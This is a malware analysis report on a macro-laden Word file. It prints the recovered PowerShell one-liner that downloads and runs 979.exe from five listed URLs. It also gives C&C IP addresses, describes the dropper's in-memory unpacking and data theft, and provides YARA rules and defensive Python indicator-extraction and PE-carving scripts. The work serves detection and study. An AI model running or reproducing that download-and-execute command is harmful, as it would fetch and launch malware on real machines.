
Malware Analysis Report

1. File info
File name: FILE-025909.doc
MD5: 7beeda071116da212aa8d3ffc4631516
Size: 275,584 Bytes

2. Analysis Environment
Operating System: Windows 7 (32-bit)
Analysis Tools: IDA, Immunity Debugger, OllyDbg, Exeinfo PE, SysTracer, Process Explorer, VBA debugger (Office), OfficeMalScanner
3. Analysis Result
Running OfficeMalScanner against the specimen finds three VBA macro modules embedded in the document.
After dumping the macros, it is clear that they are obfuscated.

We use the VBA debugger in Office to step through the macros. During debugging we recover the
string that is passed to the shell, shown below.

This shell command runs a PowerShell script (shown here as one line; the original is a single command):

powershell $Tmz=new-object Net.WebClient;$qYd='http://hockeystickz.com/XE6LOJ@http://jeffweeksphotography.com/7mHSXX@http://hellcatshockey.org/k@http://gsverwelius.nl/7Sf68C7x@http://aile.pub/KmKEymIK'.Split('@');$qtJ = '979';$ITK=$env:public+'\'+$qtJ+'.exe';foreach($Puq in $qYd){try{$Tmz.DownloadFile($Puq, $ITK);Invoke-Item $ITK;break;}catch{}}

Its purpose is to download an executable to %PUBLIC%\979.exe and run it. The script splits the embedded string on '@' to get five URLs and tries them in order; the first download that succeeds is executed with Invoke-Item and the loop breaks, while a failed download is swallowed by the empty catch block and the next URL is tried.
Payload download URLs embedded in the document (the document-stage C&C):
- http://hockeystickz.com/XE6LOJ
- http://jeffweeksphotography.com/7mHSXX
- http://hellcatshockey.org/k
- http://gsverwelius.nl/7Sf68C7x
- http://aile.pub/KmKEymIK
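As an added illustration that is not part of the original report, the following Python script pulls the payload URLs, the distinct hosts and the drop path out of that one-liner and emulates its try-each-URL-until-one-works loop offline. The command text is a constructed single-line copy of the command above; the default value of %PUBLIC% (C:\Users\Public) and the fake fetcher that stands in for WebClient.DownloadFile are assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed single-line copy of the PowerShell command recovered from the macro
# (the report shows it wrapped across lines).
DOWNLOADER_CMD = (
    "powershell $Tmz=new-object Net.WebClient;"
    "$qYd='http://hockeystickz.com/XE6LOJ@http://jeffweeksphotography.com/7mHSXX@"
    "http://hellcatshockey.org/k@http://gsverwelius.nl/7Sf68C7x@http://aile.pub/KmKEymIK'"
    ".Split('@');$qtJ = '979';$ITK=$env:public+'\\'+$qtJ+'.exe';"
    "foreach($Puq in $qYd){try{$Tmz.DownloadFile($Puq, $ITK);Invoke-Item $ITK;break;}catch{}}"
)

# Assumption: %PUBLIC% has its default value on the victim; the report does not say.
PUBLIC_DIR = r"C:\Users\Public"


def extract_iocs(cmd):
    """Pull the payload URL list, the distinct hosts and the drop path out of a
    one-liner of this shape. The URL list is the quoted string that is immediately
    .Split() on a one-character separator; the drop name is the quoted value of the
    variable that is later glued between $env:public and '.exe'."""
    m = re.search(r"'(https?://[^']*)'\.Split\('(.)'\)", cmd)
    if not m:
        raise ValueError("no Split()-delimited URL list found")
    urls = m.group(1).split(m.group(2))

    n = re.search(r"\$(\w+)\s*=\s*'([^']*)';.*?\$env:public\+'\\'\+\$\1\+'\.exe'", cmd)
    if not n:
        raise ValueError("no drop-file name found")
    drop_path = PUBLIC_DIR + "\\" + n.group(2) + ".exe"

    hosts = sorted({urlparse(u).hostname for u in urls})
    return {"urls": urls, "hosts": hosts, "drop_path": drop_path}


def emulate_fallback(urls, fetch):
    """Mirror the foreach/try/catch loop: call fetch(url) for each URL in order,
    swallow any exception (the script's catch{} is empty) and stop at the first
    success. Returns the URL that supplied the payload, or None if all failed."""
    for url in urls:
        try:
            fetch(url)
            return url          # the script would Invoke-Item the file here, then break
        except Exception:
            continue            # silent fall-through to the next host
    return None


def fake_fetch(url):
    """Constructed offline stand-in for WebClient.DownloadFile: the first two hosts
    are 'down', the third answers. Not a real download."""
    if "hellcatshockey.org" not in url:
        raise ConnectionError(url)


if __name__ == "__main__":
    iocs = extract_iocs(DOWNLOADER_CMD)
    for u in iocs["urls"]:
        print("payload url :", u)
    print("hosts       :", ", ".join(iocs["hosts"]))
    print("drop path   :", iocs["drop_path"])
    print("first working host:", emulate_fallback(iocs["urls"], fake_fetch))
```

The host list is what goes into a DNS/proxy blocklist; the drop path is the file-system indicator to hunt for. The fallback emulation makes the operational point explicit: blocking one or two of the five hosts does not stop the infection, because the loop simply moves on to the next one.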
Analysis of the executable "979.exe"
File info
MD5: 8d79ee8da119c2856f3fbaef9b8fa938
Size: 472,064 Bytes

Debugging the specimen shows that it uses self-modifying code to hinder analysis. The malware
carries a large block of encrypted bytes inside itself; it copies them into memory, then decrypts
and patches them in place.

The end result is a block of data that looks like a PE file.

The malware overwrites its own loaded image in memory with this decrypted data; the main
executable code lives in the decrypted data that is written over the original image.
The figure below shows the differences in the malware image after the executable code in
memory has been overwritten.
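To recognise and carve a decrypted image of this kind, here is an added example that is not the report's own tooling: a Python scanner that walks a raw memory blob, validates each "MZ" candidate through its e_lfanew and "PE\0\0" chain, parses the COFF and section headers, and reports which section holds the entry point. The memory blob and the minimal PE header inside it are constructed test data, not bytes from 979.exe.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_pe_at(buf, off):
    """Parse the PE image whose DOS header starts at buf[off]; None if it is not one."""
    if off + 0x40 > len(buf) or buf[off:off + 2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", buf, off + 0x3C)[0]
    pe = off + e_lfanew
    # Real e_lfanew values are small; a stray "MZ" pair in junk rarely passes this bound.
    if e_lfanew < 0x40 or e_lfanew > 0x400 or pe + 24 > len(buf):
        return None
    if buf[pe:pe + 4] != b"PE\0\0":
        return None
    machine, nsec, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", buf, pe + 4)
    if not 1 <= nsec <= 96 or opt_size < 20:
        return None
    opt = pe + 24
    sec_tbl = opt + opt_size
    if sec_tbl + 40 * nsec > len(buf):
        return None
    magic = struct.unpack_from("<H", buf, opt)[0]
    entry = struct.unpack_from("<I", buf, opt + 16)[0]       # AddressOfEntryPoint (RVA)
    image_base = None
    if magic == 0x10B and opt_size >= 32:       # PE32: ImageBase is a DWORD at +28
        image_base = struct.unpack_from("<I", buf, opt + 28)[0]
    elif magic == 0x20B and opt_size >= 32:     # PE32+: ImageBase is a QWORD at +24
        image_base = struct.unpack_from("<Q", buf, opt + 24)[0]
    sections = []
    for i in range(nsec):
        s = sec_tbl + 40 * i
        name = buf[s:s + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", buf, s + 8)
        sc = struct.unpack_from("<I", buf, s + 36)[0]
        sections.append({"name": name, "va": va, "vsize": vsize, "raw_size": raw_size,
                         "raw_ptr": raw_ptr, "exec": bool(sc & IMAGE_SCN_MEM_EXECUTE),
                         "write": bool(sc & IMAGE_SCN_MEM_WRITE)})
    return {"offset": off, "machine": machine, "is_dll": bool(chars & 0x2000),
            "entry_rva": entry, "image_base": image_base, "sections": sections}


def find_pe_images(buf):
    """Carve every parseable PE image out of a raw memory blob, in offset order."""
    found, pos = [], buf.find(b"MZ")
    while pos != -1:
        img = parse_pe_at(buf, pos)
        if img:
            found.append(img)
        pos = buf.find(b"MZ", pos + 1)
    return found


def section_containing(img, rva):
    """Name of the section whose virtual range holds rva, or None."""
    for s in img["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return s["name"]
    return None


def build_sample_pe():
    """Constructed minimal PE32 header (i386, two sections, no real code) used only
    to exercise the scanner offline. Not bytes taken from the sample."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                          # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x0102)  # i386, 2 sections, EXE, 32-bit
    opt = struct.pack("<HBBIIIIIII", 0x10B, 0, 0, 0x3000, 0x200, 0,
                      0x1234, 0x1000, 0x4000, 0x400000)              # ..., entry RVA, ..., ImageBase
    opt += bytes(0xE0 - len(opt))

    def sec(name, va, vsize, raw, raw_ptr, ch):
        return name.ljust(8, b"\0") + struct.pack("<IIIIIIHHI", vsize, va, raw, raw_ptr, 0, 0, 0, 0, ch)

    secs = (sec(b".text", 0x1000, 0x3000, 0x3000, 0x400, 0x60000020)
            + sec(b".data", 0x4000, 0x1000, 0x200, 0x3400, 0xC0000040))
    return bytes(dos) + b"PE\0\0" + coff + opt + secs


# Constructed memory blob: filler, a decoy "MZ" followed by junk, the sample image, filler.
MEMORY_BLOB = (b"\x90" * 0x80 + b"MZ" + b"\xFF" * 0x60 + b"\x00" * 0x20
               + build_sample_pe() + b"\xCC" * 0x100)

if __name__ == "__main__":
    for img in find_pe_images(MEMORY_BLOB):
        print(f"PE at blob offset 0x{img['offset']:x}, machine 0x{img['machine']:x}, "
              f"ImageBase 0x{img['image_base']:x}, entry RVA 0x{img['entry_rva']:x} "
              f"in {section_containing(img, img['entry_rva'])}")
        for s in img["sections"]:
            print(f"  {s['name']:8} va=0x{s['va']:x} vsize=0x{s['vsize']:x} "
                  f"raw=0x{s['raw_size']:x}@0x{s['raw_ptr']:x} exec={s['exec']} write={s['write']}")
```

When the decrypted block is dumped from the debugger, a scan like this confirms it really is a PE image and gives the section layout needed to decide whether it was written in raw-file or already-mapped form before loading it into IDA. A section that is both writable and executable, or an entry point outside every section, is the usual sign of a packed or patched image.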

Let's analyze the code in memory.
The malware creates a new process named "979.exe".

The new "979.exe" process checks for a file "bearsfail.exe" in the folder
"C:\Users\username\AppData\Local\Microsoft\Windows". If the file does not exist,
the malware creates it by copying itself into that folder.

After copying itself, the malware launches the copy. That process in turn spawns another
process with the same name, the same behaviour seen with the original "979.exe" file.

The malware collects the computer name, the list of running processes and other data. The data is
encoded and then encrypted with the CryptEncrypt API function.

Next, the malware encodes the encrypted data with base64.

Finally, the malware connects to its C&C servers and sends the data to them.

C&C servers:
- 207.255.226.104:50000
- 67.77.66.132:80
- 24.37.133.84:80
- 84.133.37.24:80
- 207.134.189.64:50000
- 68.42.248.45:8090
- 189.225.87.179:8443
- 41.33.127.215:8080
- 98.127.32.145:80
- 98.10.198.137:80
- 81.7.10.106:7080
- 198.0.227.57:7080
Auto start of the malware
The malware creates a registry key so that it starts automatically whenever the victim's system boots or restarts.

4. Yara rule
rule malwareDropper
{
    strings:
        $mz = "MZ"   // DOS header magic, checked at offset 0
        $func_dec = {83 C4 0C BF A2 0F 41 00 8D 6B F1 66 8B 35 F8 85 44 00 83 FB
                     07 73 01 4B 83 FD 10 73 01 4D 0F B7 C6 85 FF 74 63 3D 90 9B 09 00 75 0C E8 6F 96
                     01 00 66 8B 35 F8 85 44 00 A1 34 91 45 00 BA 38 00 00 00 8B 08 8D 40 04 81 C1 C0
                     6A 5F 01 89 48 FC 89 0D 40 91 45 00 4A 75 E9 33 C0 4F 66 85 F6 0F 94 C0 66 A3 D4
                     85 44 00 8B 44 24 10 83 F8 01 73 05 48 89 44 24 10 81 FF 0C 01 00 00 77 94 6A 29}
        $data_en = {01 F3 F5 C6 2C 5E 85 70 80 32 9D CA 0D 76 CE 2E 94 AB 27 AC
                    39 89 A6 6F 80 BB 97 A1 5B BC 6B 00 03 19 A1 E4 8A BB 98 D6 81 0C 5F 3A 83 BB 74
                    A0 90 72 5E 3A 88 14 84 59 39 37 9D 6F 6B B9 E9 D8 30 F9 49 B5 02 FC 07 01 BC 3F
                    F8 F3 CD A1 B3 50 B4 D5 DE 07 FA C3 AE 15 17 DF 9B C6 C3 74 06 FD C1 36 38 A1
                    AA 7B 52 98 A5 3A C2 1E 8C B6 26 F3 A3 84 3F 72 18 25 4A F0 C0 C3 C7 6F AF 44
                    A7 6F C5 B4 9F 0F 12 23 D3 77 CB D5 AB 91 FD F5 55 98}
        $gen_ip = {E8 C9 B7 FF FF 83 C4 04 85 C0 0F 84 FD 00 00 00 68 FA 8F C0 1D
                   BA 54 00 00 00 B9 40 05 41 00 E8 BA B0 FF FF 8B 4F 14 83 C4 04 8B F0 0F B6 01 50
                   0F B6 41 01 50 0F B6 41 02 50 0F B6 41 03 50 56 8D 85 50 FF FF FF 6A 40 50 FF 15
                   6C 35 41 00 83 C4 1C 8B CE E8 25 B1 FF FF 8B 4D FC B8 AB AA AA AA}
    condition:
        $mz at 0 and ($func_dec or $data_en or $gen_ip)
}

rule malwareOffice
{
    strings:
        $header = {D0 CF 11 E0 A1 B1 1A E1}   // OLE2 compound file header (Office 97-2003 .doc)
        // "Shell" followed, at any distance, by "msoBarTypeNormal"
        $shell_execute = {53 68 65 6C 6C [-] 6D 73 6F 42 61 72 54 79 70 65 4E 6F 72 6D 61 6C}
    condition:
        $header at 0 and $shell_execute
}

5. Conclusion
This malware is an obfuscated downloader. The dropped executable steals information from the
victim's computer after infecting it. It modifies itself in memory to make analysis harder: it
decrypts a block of data, overwrites its own executable image in memory with it, and then runs
the main code from the decrypted image.
